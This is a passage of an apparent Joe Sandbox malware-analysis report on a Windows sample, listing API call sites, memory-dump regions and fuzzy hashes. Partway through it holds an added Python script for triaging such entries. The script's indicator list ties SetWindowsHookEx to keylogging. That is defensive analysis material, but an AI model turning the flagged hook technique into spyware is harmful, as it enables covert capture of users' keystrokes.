                                • Instruction Fuzzy Hash: 2A1103B59003488FDB10DF9AD449BDEBBF8EB48214F148429E959A7640C375A544CFA5
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,05E1D87D), ref: 05E1D907
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 501ba6b2a021d052687d1ae8f1e5744b1b5ef863979c56dc3653d5d41913df01
                                • Instruction ID: 1489eae11b5f4b1c366a8edc46cbb36f4ea493a816c48959aefcb59ad1613c52
                                • Opcode Fuzzy Hash: 501ba6b2a021d052687d1ae8f1e5744b1b5ef863979c56dc3653d5d41913df01
                                • Instruction Fuzzy Hash: 7D1145B1800348CFCB10DF9AD985BDEFBF4EB48324F20842AD959A7250C7B4A544CFA5
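                                The function entries above list, per recovered function, its API call sites, the memory-dump region it was lifted from and its similarity hashes. The script below is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses entries in that layout into records, collapses the near-duplicate entries that share a call site (the two DuplicateHandle functions starting at 5e1c6d0 and 5e1c6d8 both reference 05E1C75F, as do the two KiUserCallbackDispatcher functions for 05E1D907), groups the instruction fuzzy hashes per dump region for similarity pivots, and flags APIs of triage interest. The SAMPLE_REPORT text is a constructed excerpt in the report's layout; the INDICATORS notes are general facts about the Win32 APIs, not findings about this sample's arguments, which the report shows mostly as "?".

```python
"""Parse Joe Sandbox function entries (APIs / Memory Dump Source / Similarity)
into records and summarise them for triage. Added example, not part of the
report or its tooling; SAMPLE_REPORT is a constructed excerpt in its layout."""
import re
from collections import defaultdict

# Constructed excerpt: four entries in the layout the report uses per function.
SAMPLE_REPORT = r"""
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E1C75F
Memory Dump Source
• Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
Similarity
• API ID: DuplicateHandle
• Opcode ID: ee833fb9d3de8fb477181401d43aab1c33de3c44c6210ded2015a20827574217
• Instruction Fuzzy Hash: 6E21E4B5900348DFDB10CFA9D488AEEBBF5FB48310F24846AE958A3351D374A944CF64
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E1C75F
Memory Dump Source
• Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
Similarity
• API ID: DuplicateHandle
• Opcode ID: 322e7aed6a3c613eb9854a55e056a82c92ca44ceeee9c4a9c16aca41812e4c4e
• Instruction Fuzzy Hash: 2B21C4B5900348DFDB10CFAAD584ADEBBF4FB48310F14842AE958A7350D375A954CF65
APIs
• SetWindowsHookExA.USER32(?,00000000,?,?), ref: 05E1FE83
Memory Dump Source
• Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
Similarity
• API ID: HookWindows
• Opcode ID: 3866b9630af1ec5114c8f813076f5ae197e01a6d595d9b3b51f7282ad192f692
• Instruction Fuzzy Hash: 672147B59002099FDB10CF9AC844BEEFBF5FB88320F10842AD459A7250C775A944CFA5
Memory Dump Source
• Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
Similarity
• API ID:
• String ID: \Vek
• Opcode ID: 36615ed3b50146ed30ffb59e1829a7210ca7ec747edfd8b5f3c42ba3af08aabd
• Instruction Fuzzy Hash: B0A1CDB0E00309DFDF15DFA8D8817DEBBF2AF89314F248129E814A7294DB749885DB91
"""

# "• Name.MODULE(args), ref: ADDR" lines must be tried before the generic field regex.
API_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SOURCE_RE = re.compile(r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")

# General facts about the Win32 APIs, not claims about this sample's arguments.
INDICATORS = {
    "SetWindowsHookExA": "installs a Windows hook; a WH_KEYBOARD/WH_KEYBOARD_LL hook is the standard user-mode keylogger primitive",
    "SetWindowsHookExW": "installs a Windows hook; a WH_KEYBOARD/WH_KEYBOARD_LL hook is the standard user-mode keylogger primitive",
    "DuplicateHandle": "duplicates an object handle; correlate with any process-injection behaviour reported elsewhere",
}


def new_entry():
    return {"apis": [], "source_file": None, "offset": None, "fields": {}}


def parse_entries(text):
    """One record per function; the 'Instruction Fuzzy Hash' line closes a record."""
    entries, cur = [], new_entry()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = API_RE.match(line)
        if m:
            cur["apis"].append({"name": m["name"], "module": m["module"],
                                "args": m["args"], "ref": m["ref"].upper()})
            continue
        m = SOURCE_RE.search(line)
        if m:
            cur["source_file"], cur["offset"] = m["file"], m["offset"].upper()
            continue
        m = FIELD_RE.match(line)
        if m:
            key = m["key"].strip().lower()
            cur["fields"][key] = m["value"].strip()
            if key == "instruction fuzzy hash":
                entries.append(cur)
                cur = new_entry()
    return entries


def unique_call_sites(entries):
    """Collapse functions recovered with overlapping starts that reference the same
    API at the same call-site address (same name, same ref)."""
    seen = {}
    for e in entries:
        for api in e["apis"]:
            seen.setdefault((api["name"], api["ref"]), api)
    return sorted(seen.values(), key=lambda a: a["ref"])


def summarize_by_region(entries):
    """Per dump region: function count, distinct APIs, and fuzzy hashes for similarity pivots."""
    regions = defaultdict(lambda: {"functions": 0, "apis": set(), "fuzzy_hashes": []})
    for e in entries:
        r = regions[e["offset"]]
        r["functions"] += 1
        r["apis"].update(a["name"] for a in e["apis"])
        h = e["fields"].get("instruction fuzzy hash")
        if h:
            r["fuzzy_hashes"].append(h)
    return dict(regions)


def triage_indicators(entries):
    """(api, ref, why) for each unique call site of an API listed in INDICATORS."""
    return [(a["name"], a["ref"], INDICATORS[a["name"]])
            for a in unique_call_sites(entries) if a["name"] in INDICATORS]


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE_REPORT)
    for off, info in summarize_by_region(parsed).items():
        print(f"region {off}: {info['functions']} functions, APIs={sorted(info['apis'])}, "
              f"{len(info['fuzzy_hashes'])} fuzzy hashes")
    for name, ref, why in triage_indicators(parsed):
        print(f"{name} @ {ref}: {why}")
```

                                Feed it the whole "Functions" section rather than the excerpt to get one call-site list per dump region; the fuzzy hashes it collects are what you would query against other reports to find related builds of the same loader.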
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek
                                • API String ID: 0-172235318
                                • Opcode ID: 36615ed3b50146ed30ffb59e1829a7210ca7ec747edfd8b5f3c42ba3af08aabd
                                • Instruction ID: 64d2368389bdd560c82493b98c7263868f52fa281a33565f778a4dc44e662ae6
                                • Opcode Fuzzy Hash: 36615ed3b50146ed30ffb59e1829a7210ca7ec747edfd8b5f3c42ba3af08aabd
                                • Instruction Fuzzy Hash: B0A1CDB0E00309DFDF15DFA8D8817DEBBF2AF89314F248129E814A7294DB749885DB91
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cf438df717da6ab94861711af8ff265f2a1b18f1231989d5466f69b6fca11bd1
                                • Instruction ID: fa0ea2c7854eb0cfb0259880d04075d7cf4f9d4ae754009e31f37c4a0dbceeac
                                • Opcode Fuzzy Hash: cf438df717da6ab94861711af8ff265f2a1b18f1231989d5466f69b6fca11bd1
                                • Instruction Fuzzy Hash: F2D1AE70E042048FDB14DFA9D9907AEBBB5EF89320F14856AE809DB391DBB4DC41DB91
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d66c3e921e52688e66e3c4f8e707ab5e754a75888ab4cd92d0ff4edea003390c
                                • Instruction ID: c09d0e244a11cc93050eaa154882e57a480627ee00e469675a593f2d86089104
                                • Opcode Fuzzy Hash: d66c3e921e52688e66e3c4f8e707ab5e754a75888ab4cd92d0ff4edea003390c
                                • Instruction Fuzzy Hash: 4CD19134F002089FDB14DBA8D594BADBBB6EF89310F208569E806DB350CB75ED42DB51
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f69f975c73e976c13bfaa11c602294f78c39fdcb5bda2e1326830a207b4f6f0c
                                • Instruction ID: 6075569755a1d2cced5f7edb90832c0435602e78c55fda2195c3c2f85f661eaa
                                • Opcode Fuzzy Hash: f69f975c73e976c13bfaa11c602294f78c39fdcb5bda2e1326830a207b4f6f0c
                                • Instruction Fuzzy Hash: 49B13A707002058FEB15BB68E95122933A6EFD5319BA18A2DE006DF355CF39EC4BA781
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: da17411363088778a5bfced52b09977bf39eb3808d04e84abf2dbcd3fab4a30c
                                • Instruction ID: 822f8cbd359a5c12d5fce6ec470d0a79d2176d595ab41a64c9a61e5c8f7a6592
                                • Opcode Fuzzy Hash: da17411363088778a5bfced52b09977bf39eb3808d04e84abf2dbcd3fab4a30c
                                • Instruction Fuzzy Hash: ECB15D70E00209CFDB10DFA9D8857DEBBF2AF88714F148529D815E7394EB74A885DB91
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28832bda2dafca7cde63331359b37a1366b6e51461d11356bf0cdf0def931d4b
                                • Instruction ID: a5230d4c3984e02b49746752e483b14f17ed7f5730e70b10e09bcfed52626b32
                                • Opcode Fuzzy Hash: 28832bda2dafca7cde63331359b37a1366b6e51461d11356bf0cdf0def931d4b
                                • Instruction Fuzzy Hash: 725122B4E002588FDB14CFA9C889BEDBBB1BF48314F14812AE815BB395C775A844DF95
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 99f33ca87b20aa62edea9f0c473f23d99e510989c82ce3c92bc066106b24884a
                                • Instruction ID: 2081ddcd34010772a6131487db310a3d758fdbf2502a0604c8800685c60dd559
                                • Opcode Fuzzy Hash: 99f33ca87b20aa62edea9f0c473f23d99e510989c82ce3c92bc066106b24884a
                                • Instruction Fuzzy Hash: A75124B4E002188FDB14CFA9C888B9DBBF1BF48314F14812AE815BB391D775A844DF95
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d6a5dd4d5ffcb1a922f01aef327894e0d454e580d2f64ccf39223f3b2e0d844
                                • Instruction ID: 056133d061fbd032f9bfbafdcbe111f8725c6dea14073b76f71ba4872e1f2b8a
                                • Opcode Fuzzy Hash: 7d6a5dd4d5ffcb1a922f01aef327894e0d454e580d2f64ccf39223f3b2e0d844
                                • Instruction Fuzzy Hash: EC51E9B9206245CFDB16FBE8FD90A993B71FBD2304345DB69D0004B27ADA306947DB81
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ef15b387676737c880bfc2a521447ebbb1832ce0db1da456c86d71de1095ef8
                                • Instruction ID: 9e5d723d3e097a19cd87632342c9c2c56c55ecab91db376d62546d20f2d1f45b
                                • Opcode Fuzzy Hash: 9ef15b387676737c880bfc2a521447ebbb1832ce0db1da456c86d71de1095ef8
                                • Instruction Fuzzy Hash: B241EE36B002048FDB15AB74D56876E7BA2AF8A710F648468D406DB392EF36CC06E791
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 73c9653cff3dcdeca847c90f3d31bf8415368b26c1e0fdc6915ccbf65f40283b
                                • Instruction ID: db619711c73e1385718d2c2f31944a56ed5edf625fd08eb9f4b6705f09405165
                                • Opcode Fuzzy Hash: 73c9653cff3dcdeca847c90f3d31bf8415368b26c1e0fdc6915ccbf65f40283b
                                • Instruction Fuzzy Hash: 1451F8B8206245CFDB16FBE8FD90A993B71F7D2304341DA69D0004B27ADE706947DB81
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 950c1746191e7de52a97e93c74c1f2c20457482e600189f34cbc3a708fc3ca17
                                • Instruction ID: 7a13e6bab5bc5ed7a15da80d2da2741c053efa7ee18d650d3cd7b9ddaa47eefe
                                • Opcode Fuzzy Hash: 950c1746191e7de52a97e93c74c1f2c20457482e600189f34cbc3a708fc3ca17
                                • Instruction Fuzzy Hash: A8318D35E006099FDB18DFA4D4946AEB7F2FF88310F108569E846EB345EB70AC46DB50
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e2ab0f275738ca91b2c0c1095364ec8a06bda6e3b381df3aecc910a873c6844e
                                • Instruction ID: 910ccfdbae9b0e3361dcdc0e98abfa6f3be678aceed9e7fe77266b4f4fa8ed30
                                • Opcode Fuzzy Hash: e2ab0f275738ca91b2c0c1095364ec8a06bda6e3b381df3aecc910a873c6844e
                                • Instruction Fuzzy Hash: CF316C31E142099BEB15EFA9D55179EB7B2FF85318F208529F801FB240EBB0ED419B90
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44d97929ea3a2628ac3b03536579f08fd89930e52674b5947abbcfe11338d322
                                • Instruction ID: db1ef17f369d1fff57ccc9b0889ccf323f023c3177c10869086302a3409ab869
                                • Opcode Fuzzy Hash: 44d97929ea3a2628ac3b03536579f08fd89930e52674b5947abbcfe11338d322
                                • Instruction Fuzzy Hash: 20317E30E142098FEB15DFA4D46179EB7B2FF85718F608529E802FB241EB70AD429B50
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2a0a783304fefc7b76f1198490d8cdec400c52246433e67f494d9e18424f728
                                • Instruction ID: 17d9214f05936e8d90993d18a28164f100d33bb2dd1cf5fc1e9d65df6a30d94d
                                • Opcode Fuzzy Hash: c2a0a783304fefc7b76f1198490d8cdec400c52246433e67f494d9e18424f728
                                • Instruction Fuzzy Hash: 9941D0B4D003499FDB10CFA9C584BDEBBF5BF48314F24842AE819AB250DBB59949DB90
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 34037f1041d8b7e0fcab5a4d60995695ef0a3d421f6ed03329a80a51ea93eefc
                                • Instruction ID: 3573efc3ad8c133705482b6030b91049e3d4f6fb3287cb4e46bf9585c01045fa
                                • Opcode Fuzzy Hash: 34037f1041d8b7e0fcab5a4d60995695ef0a3d421f6ed03329a80a51ea93eefc
                                • Instruction Fuzzy Hash: E8315C35E006099FDB18DFA4D4946AEB7B2FF88310F108569E806EB344DB70AC42DB50
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c4b4ce629758dc534639731f4e8cb49fd6c9c377e82cdccb8180358f497cd65
                                • Instruction ID: 37033fb82028a9983ab2c33ebe955bb738eae0cc1d6e23f4a50c7081a0b3dc44
                                • Opcode Fuzzy Hash: 1c4b4ce629758dc534639731f4e8cb49fd6c9c377e82cdccb8180358f497cd65
                                • Instruction Fuzzy Hash: EB319874A00614DFCF28EB74C9517AD77B2EF49710F2005A8D802AB391EB3ACD42DBA0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: acfdeeb8f6fac6bd32a8fcd7f6b132991c68f99b67aec802b2698b099332f8a7
                                • Instruction ID: c61a23f831d8df1acd61eb6d89d6c817b4d8381e518dbe32c34bc95d281b05d0
                                • Opcode Fuzzy Hash: acfdeeb8f6fac6bd32a8fcd7f6b132991c68f99b67aec802b2698b099332f8a7
                                • Instruction Fuzzy Hash: 1141E0B0D00349DFDB10CFA9C584ADEBBF5FF48314F24842AE809AB250DB759985CB91
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3ef25f55563aaa3a43551da4d67a5c76ee41151ca1937f6b2142af67c1df3044
                                • Instruction ID: 4c48b3516dde86d9aada03dc6e8ed5ba679775d356557bfcc45f0417c4002256
                                • Opcode Fuzzy Hash: 3ef25f55563aaa3a43551da4d67a5c76ee41151ca1937f6b2142af67c1df3044
                                • Instruction Fuzzy Hash: A3313474A006149FDF28EB74C9547AE77B2EF49754F200568D802AB394EB3ACD42DBA0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2a6492dae49de2e77bcef4a117e3f6b95dcd95f9be24dd7a24feab8831ee64ac
                                • Instruction ID: fbd40b1e67eebf36abcc492465db688e9e996af36ac9049f8e8a0feda6906d04
                                • Opcode Fuzzy Hash: 2a6492dae49de2e77bcef4a117e3f6b95dcd95f9be24dd7a24feab8831ee64ac
                                • Instruction Fuzzy Hash: 9A310778A041018FEF12EBB8E45877A3B65FB85324F184969D006CB296DE30DC57EB51
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09b73dcc74c4c49f7fee2e66e8466b8ce962a9c16519fd138a7c2069098ee073
                                • Instruction ID: 57431624f9b1ae81e18ee8984feea737d4b0c961ee1aa34960ad464905dbaa7b
                                • Opcode Fuzzy Hash: 09b73dcc74c4c49f7fee2e66e8466b8ce962a9c16519fd138a7c2069098ee073
                                • Instruction Fuzzy Hash: 6831A071E0420A9FDB15CFA4D89069EBBB2FF99314F108659E405AB341DB71AC47DB90
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e1f876137e03162be339d6543cb51bb394ac6f11bb5f58ca8dfa9a9888d3291
                                • Instruction ID: 18ed91ad4750d1252ab94edcc2eb09aab2b0fbe7d33f3dae2c632cf4d304e18a
                                • Opcode Fuzzy Hash: 0e1f876137e03162be339d6543cb51bb394ac6f11bb5f58ca8dfa9a9888d3291
                                • Instruction Fuzzy Hash: F6213031E0020A9BDB19DFA4D89069EF7B2FF99354F108659E805EB340DB71EC46DB90
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4465d229222f9d88cb45bc38e66c72af0e358ccd18fcba77a013a9406c8b2685
                                • Instruction ID: 3b6cdb7715c1056400666b8143da0bcbecc94d9ff731f7bd86d4966ddace9319
                                • Opcode Fuzzy Hash: 4465d229222f9d88cb45bc38e66c72af0e358ccd18fcba77a013a9406c8b2685
                                • Instruction Fuzzy Hash: 7C214731E016199BDB15CF64C8506DEBBB2EF99350F208619E812FB391DF709C46DB61
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 49381fc73467e8c7eaa5d3039124410834c40a1ca18829ce34e7307572010b69
                                • Instruction ID: 394b61c4abc7f9f6538777e1aa1412759ecf1a2c4400d0d8258fd5ac04455da9
                                • Opcode Fuzzy Hash: 49381fc73467e8c7eaa5d3039124410834c40a1ca18829ce34e7307572010b69
                                • Instruction Fuzzy Hash: 49213834E042418FEB326768E48937A3761F753321F280969E447C7385DF68CC96E742
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ba674166ff1f8d4ab6254d8dbc2d1db3b7280334321ec00056b5e4cc204c033c
                                • Instruction ID: a6e6b76f070de247d98e2b8a59e157894268b9d00bfc4746c0d7c848aa5b98d7
                                • Opcode Fuzzy Hash: ba674166ff1f8d4ab6254d8dbc2d1db3b7280334321ec00056b5e4cc204c033c
                                • Instruction Fuzzy Hash: B3215E35A001458FDB14EF74D559BADBBF1EF49700F104568E406EB3A1DB369D01DB50
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547595791.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f1d000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52c43fea6d8e1c3bab95d44021113eaa6a7cb8b9b2eab0c18935c40bb9ef5f1f
                                • Instruction ID: a63254c90adb91df868dc0e28378e81d8a888d74df89ebe4f5ff851c267b552d
                                • Opcode Fuzzy Hash: 52c43fea6d8e1c3bab95d44021113eaa6a7cb8b9b2eab0c18935c40bb9ef5f1f
                                • Instruction Fuzzy Hash: 9E21F276A04300DFDB14DF14D984B66BB75EB88324F20C56DD84A4B29AC33AD897DA62
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c334f9725d7f984a3fd8b90c8ed604f66634561740dd91b8d999dfc26fa5425
                                • Instruction ID: f1c173a0ef304728c97e0f9ca0401912ee4bdc02374f251ac224abff70dab0f2
                                • Opcode Fuzzy Hash: 2c334f9725d7f984a3fd8b90c8ed604f66634561740dd91b8d999dfc26fa5425
                                • Instruction Fuzzy Hash: 96213675B00205CFEB24EB74C9257AE77F6BB49340F240468D106EB2A0EF368D51EBA1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8812dfb4b7421b39ce5c4282c09f22bc761347ca8d9b8fab7f5abd7c3f89d87a
                                • Instruction ID: 950349e7082e0923bb9d72aa73bef91ab657a803cafe1660be45316a8e835cfb
                                • Opcode Fuzzy Hash: 8812dfb4b7421b39ce5c4282c09f22bc761347ca8d9b8fab7f5abd7c3f89d87a
                                • Instruction Fuzzy Hash: 08213975A00205CFEB24EB74C9657AD7BB2BF49300F240568D406EB264DB3A8D41EBA1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7367c12e223f76a191cd034cae6c487e4b0f791b637d25b2a537474f06c5fc6
                                • Instruction ID: 64e9b41256c02340c4be7044af3caba83f0806d22cd1d2c1c0fc581db0fdbc70
                                • Opcode Fuzzy Hash: d7367c12e223f76a191cd034cae6c487e4b0f791b637d25b2a537474f06c5fc6
                                • Instruction Fuzzy Hash: D2213331E006199BDB18DF68C85069EB7B2EF99350F20861AE815FB390DF70AC46DB60
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ddbb0f57572c30def144505a77629587eb9b5d0836f9896f69db51f64031e267
                                • Instruction ID: a01f04e03bf7bab2bf5b5261b61750efb629b22b906d42bc04db86c7571e02bf
                                • Opcode Fuzzy Hash: ddbb0f57572c30def144505a77629587eb9b5d0836f9896f69db51f64031e267
